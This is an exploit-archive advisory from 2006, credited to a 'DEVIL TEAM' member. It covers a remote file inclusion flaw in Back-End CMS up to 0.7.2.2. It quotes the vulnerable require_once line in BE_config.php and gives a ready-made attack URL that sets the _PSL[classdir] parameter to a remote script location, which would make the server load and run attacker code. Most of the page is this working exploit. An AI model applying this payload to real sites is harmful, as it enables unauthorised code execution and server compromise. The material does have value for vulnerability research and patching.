Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability
# Published : 2006-05-25
# Author : Kacper
# Previous Title : open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability
# Next Title : Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability

################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
#   Back-End CMS - Remote File Include Vulnerabilities
#   Find by Kacper (Rahim).
#   Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#   Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#   Site of script: http://www.back-end.org
#
####################################################################
*/

BE_config.php Line 27-31:

[code]
...
  // Script timer
  require_once($_PSL['classdir'] . '/BE_phpTimer.class');
  $scriptTimer = & pslSingleton('phpTimer');
  $scriptTimer->start('main');
  /* Use Example
...
[/code]


/*

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]

#Elo ;-)

# www.Syue.com [2006-05-25]